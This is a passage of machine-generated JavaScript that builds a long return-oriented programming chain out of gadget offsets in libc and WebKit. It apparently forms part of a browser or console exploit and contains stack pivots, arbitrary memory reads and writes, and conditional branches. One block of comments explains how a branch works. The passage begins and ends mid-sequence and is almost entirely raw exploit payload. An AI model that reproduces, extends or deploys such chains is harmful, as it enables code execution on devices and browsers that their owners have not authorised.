//mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9970: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9971: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9972: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx //L9956: libc_base+764760, //pop rsi ropchain+464520, //L9974 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+464536, //L9975 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+464504, //L9973 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L9973: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9974: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9975: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+464696, //L9979 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+464664, //L9977 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+464680, //L9978 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9976: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L9977: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9978: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9979: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+464800, //L9981 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+464784, 
//L9980 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9980: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9981: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+464880, //L9982 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9982: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9984: db([32, 0]); // 0x20 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+465000, //L9987 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+464984, //L9985 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9985: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9987: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+465144, //L9990 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+465112, //L9988 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+465128, //L9989 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9988: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9989: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9990: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+465224, //L9991 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L9991: 
db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L9993: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+465344, //L9996 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+465328, //L9994 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L9994: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9996: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+465488, //L9999 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+465456, //L9997 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+465472, //L9998 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L9997: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L9998: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L9999: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+465568, //L10000 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10000: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10002: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+465688, //L10005 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+465672, //L10003 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10003: db([0, 0]); // 0x0 
set_gadget(libc_base+144605,); //pop rdi //L10005: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+465832, //L10008 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+465800, //L10006 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+465816, //L10007 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10006: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10007: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10008: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+465912, //L10009 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10009: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10011: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+466032, //L10014 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+466016, //L10012 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10012: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10014: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+466176, //L10017 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+466144, //L10015 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+466160, //L10016 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+763368 //pop rcx ]); //L10015: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10016: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10017: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608, //pop rax //L10019: ropchain+466280, //L10018 libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+782311, //pop rsp ropchain+275424, //__ntoa_long //L10018: libc_base+853989, //mov rax, rcx libc_base+764760 //pop rsi ]); db([4294967216, 4294967295]); // -0x50 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+466352, //L10020 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10020: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10022: db([4294967272, 4294967295]); // -0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+466432, //L10023 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10023: db([0, 0]); // 0x0 //L9686: //L9479: set_gadgets([ libc_base+782311, //pop rsp ropchain+488152, //L10025 //L9269: libc_base+764760, //pop rsi ropchain+466496, //L10026 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10026: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10028: db([4294967292, 4294967295]); // -0x4 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+466616, //L10031 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+466600, //L10029 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10029: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10031: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+466792, //L10034 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+466808, //L10035 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+466760, //L10032 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+466776, //L10033 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10032: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10033: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10034: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10035: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+466904, //L10037 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+466888, //L10036 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10036: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10037: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10038: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10039: db([9, 0]); // 0x9 set_gadget(libc_base+763368,); //pop rcx //L10040: db([9, 0]); // 0x9 set_gadgets([ 
libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+467104, //L10042 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10042: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+467160, //L10043 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10043: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+467296, //L10047 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+467280, //L10046 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10045: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10046: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10047: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+467432, //L10050 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+467464, //L10052 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+467416, //L10049 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10049: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10050: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10051: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10052: db([0, 0]); // 0x0 
// Machine-generated ROP data; this fragment begins and ends mid-sequence.
// First group = a two-way conditional branch, read from the gadget comments:
//   cmp rax, rsi ; sete al ; movzx eax, al ; shl rax, 3   -> rax = 8 if equal, else 0
//   add rax, <L10053+8> ; mov rax, [rax]                   -> pick entry 0 or 1 of the
//                                                             two-entry table below
//   the chosen address is written into slot L10053, which follows `pop rsp`, so rsp is
//   reloaded with it. Entry 0 (L10053+24) is the entry right after the table, i.e.
//   fall-through; entry 1 is the label L10048. Net effect: "if equal, go to L10048".
// The operands compared (rax, rsi) are loaded before this line.
// After the branch, the chain forms r8 - 4, moves it into rdi through slot L10059 and
// reads a 32-bit value there (`mov eax, [rdi]`); the other `mov [rsi], rax` writes save
// registers into `db([0, 0])` slots that later `pop <reg>` entries consume.
set_gadgets([
    webkit_base+21212296, //cmp rax, rsi ; sete al
    libc_base+226597, //movzx eax, al
    webkit_base+5507491, //shl rax, 3
    libc_base+764760, //pop rsi
    ropchain+467576, //L10053+8
    libc_base+501454, //add rax, rsi
    libc_base+501611, //mov rax, [rax]
    libc_base+764760, //pop rsi
    ropchain+467568, //L10053
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    webkit_base+2757671, //mov rax, r9
    libc_base+782311 //pop rsp
]);
//L10053:
db([0, 0]); // 0x0
set_gadgets([
    ropchain+467592, //L10053+24
    ropchain+472112, //L10048
    libc_base+764760, //pop rsi
    ropchain+467632, //L10054
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+731401, //mov rax, r8
    libc_base+763368 //pop rcx
]);
//L10054:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L10056:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
    libc_base+501454, //add rax, rsi
    libc_base+764760, //pop rsi
    ropchain+467752, //L10059
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+384176, //mov rax, rdi
    libc_base+764760, //pop rsi
    ropchain+467736, //L10057
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+853989, //mov rax, rcx
    libc_base+763368 //pop rcx
]);
//L10057:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10059:
db([0, 0]); // 0x0
set_gadgets([
    libc_base+224145, //mov eax, [rdi]
    libc_base+764760, //pop rsi
    ropchain+467928, //L10062
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    webkit_base+2002592, //mov rax, [rsi]
    libc_base+764760, //pop rsi
    ropchain+467944, //L10063
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+384176, //mov rax, rdi
    libc_base+764760, //pop rsi
    ropchain+467896, //L10060
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+853989, //mov rax, rcx
    libc_base+764760, //pop rsi
    ropchain+467912, //L10061
    webkit_base+660161, //mov [rsi], rax ; mov al, 1
    libc_base+763368 //pop rcx
]);
//L10060:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L10061:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L10062: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10063: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+468040, //L10065 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+468024, //L10064 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10064: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10065: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+468120, //L10066 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10066: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10068: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+468240, //L10071 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+468224, //L10069 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10069: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10071: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+468416, //L10074 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+468432, //L10075 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+468384, //L10072 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+468400, //L10073 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 
//pop rcx ]); //L10072: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10073: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10074: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10075: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+468528, //L10077 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+468512, //L10076 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10076: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10077: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+468608, //L10078 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10078: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10080: db([4294967284, 4294967295]); // -0xc set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+468728, //L10083 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+468712, //L10081 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10081: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10083: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+468904, //L10086 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+468920, //L10087 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+468872, //L10084 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+468888, //L10085 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10084: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10085: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10086: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10087: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+469016, //L10089 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+469000, //L10088 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L10088: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10089: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+469096, //L10090 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10090: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10092: db([4294967252, 4294967295]); // -0x2c set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+469216, //L10095 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+469200, //L10093 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10093: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10095: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+469392, //L10098 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+469408, //L10099 webkit_base+660161, //mov 
[rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+469360, //L10096 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+469376, //L10097 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10096: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L10097: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10098: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10099: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+469568, //L10103 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+469536, //L10101 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+469552, //L10102 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10100: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L10101: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10102: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10103: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+469672, //L10105 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+469656, //L10104 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10104: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L10105: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L10106: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10107: db([0, 
0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760 //pop rsi ]); db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+469840, //L10108 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10108: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10110: db([48, 0]); // 0x30 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+469960, //L10113 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+469944, //L10111 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L10111: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10113: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+470120, //L10117 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+470072, //L10114 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+470088, //L10115 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L10114: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L10115: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10116: db([8, 0]); // 0x8 set_gadget(libc_base+759608,); //pop rax //L10117: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+470176, //L10118 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L10118: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L10120: db([48, 0]); 
